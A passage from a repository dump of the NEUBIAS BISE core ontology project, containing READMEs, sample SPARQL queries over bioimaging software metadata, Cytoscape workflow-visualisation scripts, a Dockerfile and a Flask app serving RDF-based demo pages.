bise-ld-webapp\nsource activate bise-ld-webapp\nconda install flask rdflib pymongo -c conda-forge\nconda install rdflib-jsonld -c bioconda\n```\n### Launch the web app\n```\ncd bise-linked-data-webapp\npython app.py\n```\n" }, { "alpha_fraction": 0.8112094402313232, "alphanum_fraction": 0.8200590014457703, "avg_line_length": 168.5, "blob_id": "ee99e9689098a2505a9c24cc45b318a4ad61625e", "content_id": "680ecfe2f67cd454a0d5ba342ed71ecd4509fda6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 339, "license_type": "no_license", "max_line_length": 317, "num_lines": 2, "path": "/owl-ontology/README.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# BISE core ontology\nBISE core ontology is a controlled vocabulary aimed at describing the content of the BISE Bio-Imaging Search engine. The documentation is dynamically generated here : http://www.essepuntato.it/lode/reasoner/https://raw.githubusercontent.com/NeuBIAS/bise-core-ontology/master/owl-ontology/bise-core-ontology-v1.0.1.ttl\n" }, { "alpha_fraction": 0.6949860453605652, "alphanum_fraction": 0.714484691619873, "avg_line_length": 41.17647171020508, "blob_id": "0aad973cc2577c5fb2020b0cb3ffdfd22e02c593", "content_id": "bddd8f74f5cc87d51abe996d77ab81f69e2164c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 718, "license_type": "no_license", "max_line_length": 148, "num_lines": 17, "path": "/data-dumps/Readme.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# RDF data dumps generation\n\n## Data transformation process\n\n 1. For each CSV table, write a SPARQL CONSTRUCT query to align column names to RDF predicates. \n 2. Run TARQL to produce one RDF for each CSV table. \n 3. The resulting RDF files can later be deployed onto a SPARQL endpoint. A sample SPARQL endpoint is available here : http://192.54.201.50/sparql\n\n## Sample SPARQL queries\nThe following queries search for BIII registry entities whose label contains the word \"segmentation\" or \"registration\" : \n\n PREFIX biii:<http://biii.org/> \n SELECT ?x ?label ?type WHERE {\n ?x rdfs:label ?label\n FILTER (regex(?label,\"segmentation\") || regex(?label,\"registration\"))\n ?x rdf:type ?type\n } \n" }, { "alpha_fraction": 0.7088757157325745, "alphanum_fraction": 0.7221893668174744, "avg_line_length": 40.20731735229492, "blob_id": "ad908ec00ddc5850b5b7f29196f7d83e0ab842a7", "content_id": "682ba382111451a1ee2dbfa0b4511a142783b384", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3380, "license_type": "no_license", "max_line_length": 750, "num_lines": 82, "path": "/demo-queries.md", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "# Sample queries leveraging EDAM-Bioimaging and Bise Core ontologies\n## Motivations\n[Bise Core Ontology](http://www.essepuntato.it/lode/owlapi/https://raw.githubusercontent.com/NeuBIAS/neubias-data-model/master/owl-ontology/bise-core-ontology-v1.owl#d4e233) has been designed to model and better share the content of the [biii.eu](http://biii.eu) bioimaging ressources repository. [EDAM Bioimaging](https://bioportal.bioontology.org/ontologies/EDAM-BIOIMAGING) aims at capturing domain-specific knowledge related to bioimaging data analysis in terms of [topics](http://bioportal.bioontology.org/ontologies/EDAM-BIOIMAGING/?p=classes&conceptid=http%3A%2F%2Fedamontology.org%2Ftopic_0003) and [operations](http://bioportal.bioontology.org/ontologies/EDAM-BIOIMAGING/?p=classes&conceptid=http%3A%2F%2Fedamontology.org%2Foperation_0004) .\nThis web page briefly illustrates sample queries benefiting from knowledge captured in these two ontologies. Still, the RDF data dump is in a very preliminary stage and covers only few concepts and relations. \n\n## Q1\n### Intention\nShowing softwares and their dependencies. \n### How\n```\nCONSTRUCT {\n ?s1 <requires> ?d1\n} WHERE {\n ?s1 a <http://biii.eu/node/software>\n ?s1 <http://bise-eu.info/core-ontology#requires> ?d1\n}\n```\n### Results\n![](fig/deps.png)\n\n## Q2\n### Intention\nInferring software author communities based on shared interests (EDAM-Bioimaging Operations)\n### How\nwe match pairs of softwares with their corresponding authors. As soon as the tools share the same EDAM operation, we make the assumption that authors share similar interets. FInally, we build a graph with edges `<share_same_interests_with>` between authors. \n```\nCONSTRUCT {\n ?a1 <share_same_interests_with> ?a2\n} where {\n ?s1 a <http://biii.eu/node/software>\n ?s1 <http://bise-eu.info/core-ontology#hasAuthor> ?a1\n ?s1 <http://bise-eu.info/core-ontology#hasFunction> ?f1\n\n ?s2 a <http://biii.eu/node/software>\n ?s2 <http://bise-eu.info/core-ontology#hasAuthor> ?a2\n ?s2 <http://bise-eu.info/core-ontology#hasFunction> ?f1\n}\n```\n### Results\n![](fig/authors.png)\n\n## Q3\n### Intention\nSearch all available tools related to an EDAM topic. \n### How\nWe match an EDAM Topic which has a label which contains \"microscopy\". Then we search in the taxonomy all corresponding subclasses `?c rdfs:subClassOf* ?superClass`, and the softwares annotated with them. Finally, we display for each matched subgraph, an edge between a software label and a topic label. \n\n```\nCONSTRUCT {\n ?ti <http://bise-eu.info/core-ontology#hasTopic> ?label .\n} where {\n ?x a <http://biii.eu/node/software>\n ?x <http://bise-eu.info/core-ontology#hasAuthor> ?a\n ?x <http://dcterms/title> ?ti .\n ?x <http://bise-eu.info/core-ontology#hasTopic> ?c .\n\n ?c rdfs:subClassOf* ?superClass\n ?superClass rdfs:label ?label\n\n FILTER (?label ~ \"microscopy\")\n}\n```\n### Results\n![](fig/topics.png)\n\n## Q4\n### Intention\nExtract some metrics (sorted counts) based on EDAM terms. e.g. which topic is the most represented in biii.eu ?\n### How\n\n```\nSELECT ?label (count(distinct ?s1) as ?soft_count) WHERE { \n ?s1 a <http://biii.eu/node/software> \n ?s1 <http://bise-eu.info/core-ontology#hasTopic> ?edam_class\n \n ?edam_class rdfs:label ?label\n}\nGROUP BY ?edam_class ?label\nORDER BY DESC(?soft_count)\n```\n### Results\n![](fig/soft-counts.png)\n\n" }, { "alpha_fraction": 0.7319148778915405, "alphanum_fraction": 0.7446808218955994, "avg_line_length": 77.33333587646484, "blob_id": "47576a161054aa43bc5ba5857efef49ed95772af", "content_id": "4895cab69bcbd9981fe2a4a37fee10829840822b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 235, "license_type": "no_license", "max_line_length": 85, "num_lines": 3, "path": "/data-dumps/deprecated/run-tarql.sh", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "tarql -v -d \";\" biii-csv2rdf-entity.sparql entity.csv > rdf/entries.ttl\ntarql -v -d \";\" biii-csv2rdf-software.sparql softwareartifact.csv > rdf/softwares.ttl\ntarql -v -d \";\" biii-csv2rdf-paper.sparql academicpaper.csv > rdf/papers.ttl\n" }, { "alpha_fraction": 0.48383280634880066, "alphanum_fraction": 0.5023659467697144, "avg_line_length": 24.350000381469727, "blob_id": "e13718afce8713428c66cd7b3d5770164ed7ce7a", "content_id": "5e090df67a60abd3fb35893f975c1827f69ca6d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2536, "license_type": "no_license", "max_line_length": 113, "num_lines": 100, "path": "/wf-html-vis/test.js", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "/*\n* @Author: Alban Gaignard\n* @Date: 2020-03-01 15:55:48\n* @Last Modified by: Alban Gaignard\n* @Last Modified time: 2020-03-02 11:59:09\n*/\n\nvar node_id = \"1432\"\nvar node_url = \"http://test.biii.eu/node/\" + node_id\n//var node_url_json = node_url + \"?_format=json \"\n\nvar nodes = new Set() ;\nvar edges = [] ;\n\nvar cyjs_nodes = [] ;\nvar cyjs_edges = [] ;\n\n//\n//\n//\nvar node2cy = function(x) {\n\t// console.log({data: {id: x} })\n\treturn {data: {id: x, name: x} }\n}\n\n//\n//\n//\nvar edge2cy = function(x) {\n\t// console.log({data: {source: x.source, target: x.target} })\n\treturn {data: {source: x.source, target: x.target} }\n}\n\nvar updateWorkflowVis = function(json_node_url) {\n\n\t\t$.getJSON('http://test.biii.eu/wfsteps?_format=json', function(data) {\n\t\t//$.getJSON(json_node_url + \"?_format=json\", function(data) {\n\t\t console.log(data);\n\n\t\t $.each(data, function( key, value ) {\n\t\t \t\t// console.log( key + \": \" + value[\"parent_id\"] );\n\t\t \t\t if (value[\"parent_id\"] == node_id) {\n\t\t \t\t\tnodes.add(value[\"field_current_workflow_step__1\"])\n\t\t \t\t\tnodes.add(value[\"field_previous_workflow_step\"])\n\t\t \t\t\tedges.push({source:value[\"field_previous_workflow_step\"], target:value[\"field_current_workflow_step__1\"]})\n\t\t \t\t\t//console.log( value[\"field_current_workflow_step__1\"] );\n\t\t \t\t\t//console.log( value[\"field_previous_workflow_step\"] );\n\t\t \t\t }\n\t\t\t});\n\n\t\t\tconsole.log(nodes)\n\t\t\tconsole.log(edges)\n\n\t\t\tcyjs_nodes = [...nodes].filter(x => x != \"\").map(node2cy)\n\t\t\tcyjs_edges = [...edges].filter(x => x.source != \"\" && x.target != \"\").map(edge2cy)\n\n\t\t\tvar cy = window.cy = cytoscape({\n\t\t container: document.getElementById('cy'),\n\n\t\t boxSelectionEnabled: false,\n\t\t autounselectify: true,\n\n\t\t layout: {\n\t\t name: 'dagre'\n\t\t },\n\n\t\t style: [\n\t\t {\n\t\t selector: 'node',\n\t\t style: {\n\t\t 'background-color': '#11479e',\n\t\t 'label': 'data(name)',\n\t\t }\n\t\t },\n\n\t\t {\n\t\t selector: 'edge',\n\t\t style: {\n\t\t 'width': 4,\n\t\t 'target-arrow-shape': 'triangle',\n\t\t 'line-color': '#9dbaea',\n\t\t 'target-arrow-color': '#9dbaea',\n\t\t 'curve-style': 'bezier'\n\t\t }\n\t\t }\n\t\t ],\n\n\t\t elements: {\n\t\t nodes: cyjs_nodes,\n\t\t edges: cyjs_edges\n\t\t }\n\t\t });\n\n\t\t});\n\t}\n\nupdateWorkflowVis(node_url)\n\n//console.log(cyjs_nodes)\n//console.log(cyjs_edges)\n\n" }, { "alpha_fraction": 0.738095223903656, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 9.5, "blob_id": "48de8aeb13571a16ac6a354368ca7c24e290b793", "content_id": "7a2ad8071a3afe2e10f0fa3b74193a60ddfba0fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 42, "license_type": "no_license", "max_line_length": 13, "num_lines": 4, "path": "/requirements.txt", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "rdflib==6.0.2\nmatplotlib\nseaborn\nnetworkx\n" }, { "alpha_fraction": 0.7321428656578064, "alphanum_fraction": 0.7596153616905212, "avg_line_length": 23.266666412353516, "blob_id": "e99bd61e6f96e622393664484060add061b15504", "content_id": "702c47c8c657f028184fc024581ca7332f419482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 728, "license_type": "no_license", "max_line_length": 81, "num_lines": 30, "path": "/bise-linked-data-webapp/Dockerfile", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "FROM ubuntu:16.04\n\nMAINTAINER Alban Gaignard <[email protected]>\n\nRUN apt-get update\n\nRUN apt-get install -y git curl wget bzip2 vim lynx\n\n# Install miniconda to /miniconda\nRUN curl -LO http://repo.continuum.io/miniconda/Miniconda3-latest-Linux-x86_64.sh\nRUN bash Miniconda3-latest-Linux-x86_64.sh -p /miniconda -b\nRUN rm Miniconda3-latest-Linux-x86_64.sh\nENV PATH=/miniconda/bin:${PATH}\n\nSHELL [\"/bin/bash\", \"-c\"]\n\nRUN conda update -y conda\n\nRUN conda create --name bise-ld-webapp\nRUN source activate bise-ld-webapp\nRUN conda install flask rdflib pymongo pyopenssl -c conda-forge\nRUN pip install rdflib-jsonld\nRUN pip install Flask-SSLify\n\nCOPY app.py .\nCOPY templates templates\nCOPY static static\nCOPY launch.sh .\n\nENTRYPOINT [ \"./launch.sh\" ]\n" }, { "alpha_fraction": 0.537019670009613, "alphanum_fraction": 0.5464698672294617, "avg_line_length": 34.082191467285156, "blob_id": "89d223f086c3fc0a85daf7f405b0e6d6fc60ac43", "content_id": "385e95ebbb97aea83d2cc1a734f8b7178c4eeebc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12804, "license_type": "no_license", "max_line_length": 122, "num_lines": 365, "path": "/bise-linked-data-webapp/app.py", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "import csv\nfrom flask import Flask, redirect, url_for, request, render_template\nimport random\n\nfrom rdflib import ConjunctiveGraph\n\napp = Flask(__name__)\n\nns = {\"nb\": \"http://bise-eu.info/core-ontology#\",\n \"dc\": \"http://dcterms/\",\n \"p-plan\": \"http://purl.org/net/p-plan#\",\n \"edam\": \"http://purl.obolibrary.org/obo/edam#\"}\n\ng = ConjunctiveGraph()\n#g.parse(\"bise-linked-data-webapp/static/data/neubias-dump-20180129.ttl\", format=\"turtle\")\ng.parse(\"static/data/neubias-latest.ttl\", format=\"turtle\")\ng.parse(\"static/data/EDAM-bioimaging_alpha03.owl\")\nprint(str(len(g)) + ' triples in Biii data graph')\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected]('/curation_needs_demo')\ndef curation_needs_demo():\n\n # NO PUBLICATION\n q_no_publication = \"\"\"\n SELECT (count(?title) as ?nb_soft) WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasReferencePublication ?publication} .\n }\n \"\"\"\n q_no_publication_entries = \"\"\"\n SELECT ?s ?title WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasReferencePublication ?publication} .\n }\n \"\"\"\n results = g.query(q_no_publication, initNs=ns)\n count_no_pub = 0\n for r in results:\n print(r)\n count_no_pub = str(r[\"nb_soft\"])\n\n results = g.query(q_no_publication_entries, initNs=ns)\n no_pub = []\n for r in results:\n no_pub.append({\"title\": r[\"title\"], \"url\": r[\"s\"]})\n if len(no_pub) > 5:\n no_pub = random.sample(no_pub, 10)\n\n # NO EDAM TOPIC OR FUNCTION\n q_no_edam = \"\"\"\n SELECT (count(?title) as ?nb_soft) WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasTopic ?topic} .\n FILTER NOT EXISTS {?s nb:hasFunction ?operation} .\n }\n \"\"\"\n results = g.query(q_no_edam, initNs=ns)\n count_no_edam = 0\n for r in results:\n count_no_edam = str(r[\"nb_soft\"])\n\n q_no_edam_entries = \"\"\"\n SELECT ?s ?title WHERE {\n ?s rdf:type <http://biii.eu/node/software> .\n ?s dc:title ?title .\n FILTER NOT EXISTS {?s nb:hasTopic ?topic} .\n FILTER NOT EXISTS {?s nb:hasFunction ?operation} .\n }\n \"\"\"\n results = g.query(q_no_edam_entries, initNs=ns)\n no_edam = []\n for r in results:\n no_edam.append({\"title\": r[\"title\"], \"url\": r[\"s\"]})\n if len(no_edam) > 5:\n no_edam = random.sample(no_edam, 10)\n\n return render_template('demo_curation_needs.html',\n count_no_pub=count_no_pub,\n count_no_edam=count_no_edam,\n missing_publication = no_pub,\n missing_edam=no_edam)\n\n\[email protected]('/comulis_demo')\ndef comulis_demo():\n q_segmentation = \"\"\"\n SELECT DISTINCT ?soft ?title \n (group_concat(?function_label;separator=\"|\") as ?operations)\n (group_concat(?topic_label;separator=\"|\") as ?topics) \n WHERE { \n ?soft a <http://biii.eu/node/software> .\n ?soft <http://bise-eu.info/core-ontology#hasFunction> ?edam_function .\n ?edam_function rdfs:subClassOf* <http://edamontology.org/operation_Image_segmentation> . \n ?edam_function rdfs:label ?function_label .\n ?soft dc:title ?title .\n \n OPTIONAL {\n ?soft <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?edam_topic rdfs:label ?topic_label .\n }\n }\n GROUP BY ?soft\n ORDER BY ?title\n \"\"\"\n\n q_registration = \"\"\"\n SELECT DISTINCT ?soft ?title \n (group_concat(?function_label;separator=\"|\") as ?operations)\n (group_concat(?topic_label;separator=\"|\") as ?topics) \n WHERE { \n ?soft a <http://biii.eu/node/software> .\n ?soft <http://bise-eu.info/core-ontology#hasFunction> ?edam_function . \n ?edam_function rdfs:subClassOf* <http://edamontology.org/operation_Image_registration> . \n ?edam_function rdfs:label ?function_label . \n ?soft dc:title ?title .\n \n OPTIONAL {\n ?soft <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?edam_topic rdfs:label ?topic_label .\n }\n }\n GROUP BY ?soft\n ORDER BY ?title\n \"\"\"\n\n q_visualisation = \"\"\"\n SELECT DISTINCT ?soft ?title \n (group_concat(?function_label;separator=\"|\") as ?operations)\n (group_concat(?topic_label;separator=\"|\") as ?topics)\n WHERE { \n ?soft a <http://biii.eu/node/software> .\n ?soft <http://bise-eu.info/core-ontology#hasFunction> ?edam_function .\n ?edam_function rdfs:subClassOf* <http://edamontology.org/operation_Image_visualisation> . \n ?edam_function rdfs:label ?function_label .\n\n ?soft dc:title ?title .\n \n OPTIONAL {\n ?soft <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?edam_topic rdfs:label ?topic_label .\n }\n }\n GROUP BY ?soft\n ORDER BY ?title\n \"\"\"\n\n seg_entries = []\n results = g.query(q_segmentation, initNs=ns)\n for r in results:\n title = str(r[\"title\"])\n url = str(r[\"soft\"])\n operations = list(set(str(r[\"operations\"]).split(\"|\")))\n operations = filter(None, operations)\n topics = list(set(str(r[\"topics\"]).split(\"|\")))\n topics = filter(None, topics)\n seg_entries.append({\"title\":title, \"url\":url, \"operations\":operations, \"topics\":topics})\n\n reg_entries = []\n results = g.query(q_registration, initNs=ns)\n for r in results:\n title = str(r[\"title\"])\n url = str(r[\"soft\"])\n operations = list(set(str(r[\"operations\"]).split(\"|\")))\n operations = filter(None, operations)\n topics = list(set(str(r[\"topics\"]).split(\"|\")))\n topics = filter(None, topics)\n reg_entries.append({\"title\": title, \"url\": url, \"operations\": operations, \"topics\": topics})\n\n vis_entries = []\n results = g.query(q_visualisation, initNs=ns)\n for r in results:\n title = str(r[\"title\"])\n url = str(r[\"soft\"])\n operations = list(set(str(r[\"operations\"]).split(\"|\")))\n operations = filter(None, operations)\n topics = list(set(str(r[\"topics\"]).split(\"|\")))\n topics = filter(None, topics)\n vis_entries.append({\"title\": title, \"url\": url, \"operations\": operations, \"topics\": topics})\n\n return render_template('demo_comulis.html', seg_entries=seg_entries, reg_entries=reg_entries, vis_entries=vis_entries)\n\[email protected]('/cy')\ndef cy():\n return render_template('test_cy.html')\n\[email protected]('/topic_map_demo')\ndef topic_map_demo():\n query = \"\"\"\n SELECT ?topic_label ?operation_label WHERE {\n ?x a <http://biii.eu/node/software> .\n ?x <http://bise-eu.info/core-ontology#hasTopic> ?edam_topic .\n ?x <http://bise-eu.info/core-ontology#hasFunction> ?edam_operation .\n ?x <http://dcterms/title> ?title .\n \n ?edam_topic rdfs:label ?topic_label .\n ?edam_operation rdfs:label ?operation_label .\n } \n \"\"\"\n\n list_of_nodes = []\n list_of_edges = []\n qres = g.query(query)\n for row in qres:\n #print(row[\"topic_label\"] + \" <-> \" + row[\"operation_label\"])\n list_of_nodes.append({\"id\": row[\"topic_label\"], \"type\": \"topic\"})\n list_of_nodes.append({\"id\": row[\"operation_label\"], \"type\": \"operation\"})\n list_of_edges.append({\"source\": row[\"topic_label\"], \"target\": row[\"operation_label\"]})\n\n return render_template('demo_topic_map.html', nodes=list_of_nodes, edges=list_of_edges)\n\[email protected]('/graphQ4')\ndef graphQ4():\n tbl = []\n qres = g.query(\n \"\"\" \n\tSELECT ?label (count(distinct ?s1) as ?soft_count) \n\tWHERE { \n\t ?s1 a <http://biii.eu/node/software> .\n\t ?s1 biii:hasTopic ?edam_class .\n\t ?edam_class rdfs:label ?label .\n\t}\n\tGROUP BY ?edam_class ?label\n \n\tORDER BY DESC(?soft_count)\n\n \"\"\", initNs=ns)\n\n for row in qres:\n tbl.append({\"name\": row['label'],\"count\":row['soft_count']})\n\n return render_template('testQ4.html', tbl=tbl)\n\[email protected]('/demo_query_3')\ndef demoQ3():\n query = \"\"\"\n CONSTRUCT {\n ?ti <http://bise-eu.info/core-ontology#hasTopic> ?label \n } WHERE {\n ?x a <http://biii.eu/node/software> .\n ?x <http://bise-eu.info/core-ontology#hasAuthor> ?a .\n ?x <http://dcterms/title> ?ti .\n ?x <http://bise-eu.info/core-ontology#hasTopic> ?c .\n \n ?c rdfs:subClassOf* ?superClass .\n ?superClass rdfs:label ?label .\n \n FILTER (regex(?label, \"microscopy\"))\n } \n \"\"\"\n\n qres = g.query(query)\n\n list_of_nodes = []\n list_of_edges = []\n for row in qres:\n list_of_nodes.append({\"id\": row[0], \"type\" :\"software\"})\n list_of_nodes.append({\"id\": row[2], \"type\" : \"topic\"})\n list_of_edges.append({\"source\": row[0], \"target\": row[2], \"edge_label\": row[1]})\n\n # print(list_of_nodes)\n # print(list_of_edges)\n return render_template('demo_d3.html', nodes=list_of_nodes, edges=list_of_edges)\n\n## Demo Workflow 1\[email protected]('/sparql')\ndef sparql():\n return render_template('sparql.html')\n\n## Demo Workflow 1\[email protected]('/graph')\ndef graph():\n # list_of_nodes = [{\"label\": \"node1\"},\n # {\"label\": \"node2\"},\n # {\"label\": \"node3\"}]\n # list_of_edges = [{\"source\": \"node1\", \"target\": \"node2\"},\n # {\"source\": \"node1\", \"target\": \"node3\"}]\n list_of_nodes = []\n list_of_edges = []\n\n qres = g.query(\n \"\"\"\n SELECT DISTINCT ?c2 ?f2_label ?c1 ?f1_label WHERE {\n ?c2 p-plan:isPreceededBy ?c1 .\n\n ?c2 nb:hasImplementation ?s2 .\n ?c2 nb:hasFunction> ?f2 .\n ?f2 rdfs:label ?f2_label .\n\n ?c1 nb:hasImplementation ?s1 . \n ?c1 nb:hasFunction ?f1 . \n ?f1 rdfs:label ?f1_label .\n }\n \"\"\", initNs=ns)\n\n with open('static/data/wf.csv', 'w', newline='') as csvfile:\n fieldnames = ['source', 'source_label', 'target', 'target_label', 'value']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for row in qres:\n list_of_nodes.append({\"id\": row['c1']})\n list_of_nodes.append({\"id\": row['c2']})\n list_of_edges.append({\"source\": row['c1'], \"target\": row['c2'],\n \"source_label\": row['f1_label'], \"target_label\": row['f2_label']})\n # writer.writerow({'source': row['c1'],\n # 'source_label': row['f1_label'],\n # 'target': row['c2'],\n # 'target_label': row['f2_label'],\n # 'value': '2'})\n\n return render_template('test.html', nodes=list_of_nodes, edges=list_of_edges)\n\[email protected]('/welcome')\ndef welcome():\n qres = g.query(\n \"\"\"\n SELECT DISTINCT ?c2 ?f2_label ?c1 ?f1_label WHERE {\n ?c2 p-plan:isPreceededBy ?c1 .\n\n ?c2 biii:hasImplementation ?s2 .\n ?c2 biii:hasFunction ?f2 .\n ?f2 rdfs:label ?f2_label .\n\n ?c1 biii:hasImplementation ?s1 . \n ?c1 biii:hasFunction ?f1 . \n ?f1 rdfs:label ?f1_label .\n }\n \"\"\", initNs=ns)\n\n with open('static/data/wf.csv', 'w', newline='') as csvfile:\n fieldnames = ['source', 'source_label', 'target', 'target_label', 'value']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for row in qres:\n # writer.writerow({'source': row['f1_label'], 'target': row['f2_label'], 'value': '2'})\n # writer.writerow({'source': str(row['f1_label']+\"\\n\"+row['c1']),\n # 'source_label': row['f1_label'],\n # 'target': str(row['f1_label']+\"\\n\"+row['c1']),\n # 'target_label': row['f2_label'],\n # 'value': '3'})\n\n writer.writerow({'source': row['c1'],\n 'source_label': row['f1_label'],\n 'target': row['c2'],\n 'target_label': row['f2_label'],\n 'value': '2'})\n\n # print(row['c2'])\n # print(row['c1'])\n # print(\"%s %s %s %s\" % row)\n\n return render_template('wf.html')\n\n\nif __name__ == \"__main__\":\n # context = ('myserver-dev.crt', 'myserver-dev.key')\n # app.run(host='0.0.0.0', port=5000, debug=True, ssl_context=context)\n # context = ('myserver-dev.crt', 'myserver-dev.key')\n app.run(host='0.0.0.0', port=5000, debug=True)" }, { "alpha_fraction": 0.4859446883201599, "alphanum_fraction": 0.5004608035087585, "avg_line_length": 29.77305030822754, "blob_id": "9ceee07f9cd04a596302188115ac90e788e992fa", "content_id": "6274bb1e4b647464092133dbd26ffa09502c7275", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4340, "license_type": "no_license", "max_line_length": 114, "num_lines": 141, "path": "/wf-html-vis/main.js", "repo_name": "NEUBIAS/bise-core-ontology", "src_encoding": "UTF-8", "text": "/*\n* @Author: Alban Gaignard\n* @Date: 2020-03-01 15:55:48\n* @Last Modified by: Alban Gaignard\n* @Last Modified time: 2020-03-02 13:04:39\n*/\n\n// var node_id = \"1432\"\nvar node_id = \"50\"\nvar node_url = \"http://test.biii.eu/node/\" + node_id\nvar node_url = \"http://biii.eu/node/\" + node_id\n//var node_url_json = node_url + \"?_format=json \"\n\nvar nodes = new Set() ;\nvar edges = [] ;\n\nvar cyjs_nodes = [] ;\nvar cyjs_edges = [] ;\n\n//\n//\n//\nvar node2cy = function(x) {\n\t// console.log({data: {id: x} })\n\treturn {data: {id: x, name: x} }\n}\n\n//\n//\n//\nvar edge2cy = function(x) {\n\t// console.log({data: {source: x.source, target: x.target} })\n\treturn {data: {source: x.source, target: x.target} }\n}\n\nvar updateWorkflowVis = function(json_node_url) {\n\n\t\t// $.getJSON('http://test.biii.eu/wfsteps?_format=json', function(data) {\n\t\t$.getJSON('http://biii.eu/wfsteps?_format=json', function(data) {\t\n\t\t// $.getJSON(json_node_url + \"?_format=json \", function(data) {\n\t\t console.log(data);\n\n\t\t $.each(data, function( key, value ) {\n\t\t \t\t// console.log( key + \": \" + value[\"parent_id\"] );\n\t\t \t\t if (value[\"parent_id\"] == node_id) {\n\t\t \t\t\tnodes.add(value[\"field_current_workflow_step__1\"])\n\t\t \t\t\tif (value[\"field_previous_workflow_step\"].includes(\", \")) {\n\t\t \t\t\t\t$.each(value[\"field_previous_workflow_step\"].split(\", \"), function( key, sub_value ) {\n\t\t \t\t\t\t\tnodes.add(sub_value)\n\t\t \t\t\t\t\tedges.push({source:sub_value, target:value[\"field_current_workflow_step__1\"]})\n\t\t \t\t\t\t})\n\t\t \t\t\t} else {\n\t\t \t\t\t\tnodes.add(value[\"field_previous_workflow_step\"])\t\n\t\t \t\t\t\tedges.push({source:value[\"field_previous_workflow_step\"], target:value[\"field_current_workflow_step__1\"]})\n\t\t \t\t\t}\n\t\t \t\t\t\n\t\t \t\t\t//console.log( value[\"field_current_workflow_step__1\"] );\n\t\t \t\t\t//console.log( value[\"field_previous_workflow_step\"] );\n\t\t \t\t }\n\t\t\t});\n\n\t\t\tconsole.log(nodes)\n\t\t\tconsole.log(edges)\n\n\t\t\tcyjs_nodes = [...nodes].filter(x => x != \"\").map(node2cy)\n\t\t\tcyjs_edges = [...edges].filter(x => x.source != \"\" && x.target != \"\").map(edge2cy)\n\n\t\t\tvar cy = window.cy = cytoscape({\n\t\t container: document.getElementById('cy'),\n\n\t\t boxSelectionEnabled: false,\n\t\t autounselectify: true,\n\n\t\t layout: {\n\t\t name: 'dagre'\n\t\t },\n\n\t\t style: [\n\t\t {\n\t\t selector: 'node',\n\t\t style: {\n\t\t 'border-color': '#11479e',\n\t\t 'border-width': '2px',\n\t\t 'background-color': 'white',\n\t\t 'content': 'data(name)',\n\t\t 'shape': 'roundrectangle', \n\t\t 'text-valign': 'center', \n\t\t 'text-halign': 'center',\n\t\t 'text-wrap': 'wrap',\n\t\t 'text-max-width': '130px',\n\t\t 'width': '150px',\n\t\t 'height': 'label', \n\t\t 'padding-left': '5px', \n\t\t 'padding-right': '5px', \n\t\t 'padding-top': '10px', \n\t\t 'padding-bottom': '10px', \n\t\t }\n\t\t },\n\n\t\t {\n\t\t selector: 'edge',\n\t\t style: {\n\t\t 'width': 4,\n\t\t 'target-arrow-shape': 'triangle',\n\t\t 'line-color': '#9dbaea',\n\t\t 'target-arrow-color': '#9dbaea',\n\t\t 'curve-style': 'bezier'\n\t\t }\n\t\t }\n\t\t ],\n\n\t\t elements: {\n\t\t nodes: cyjs_nodes,\n\t\t edges: cyjs_edges\n\t\t }\n\t\t });\n\n\t\t\t// cy.nodeHtmlLabel([ {\n // \t\t\tquery: 'node', // cytoscape query selector\n // \t\t\thalign: 'center', // title vertical position. Can be 'left',''center, 'right'\n\t\t\t// valign: 'center', // title vertical position. Can be 'top',''center, 'bottom'\n\t\t\t// halignBox: 'center', // title vertical position. Can be 'left',''center, 'right'\n\t\t\t// valignBox: 'center', // title relative box vertical position. Can be 'top',''center, 'bottom'\n\t\t\t// cssClass: '', // any classes will be as attribute of <div> container for every title\n\t\t\t// tpl(data) {\n\t\t\t// return '<a href=\"node_url\">' + data.name + '</a>'; // your html template here\n\t\t\t// }\n\t\t\t// }\n\t\t\t//]);\n\n\t\t});\n\t}\n\nupdateWorkflowVis(node_url)\n\n// console.log('NODES')\n// console.log(cyjs_nodes)\n// console.log('----')\n// console.log('EDGES')\n// console.log(cyjs_edges)\n// console.log('----')\n\n" }, { "alpha_fraction": 0.7213114500045776, "alphanum_fraction": 0.7213114500045776, "avg_line_length": 14.25, "blob_id": "d7d0a028ad8ba21449b68ac1b1149367e17f9d5e", "content_id": "7e3e94c081722a44be58df1bcd9d92cdde130779", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 61, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/bise-linked-data-webapp/launch.sh", "repo_name": 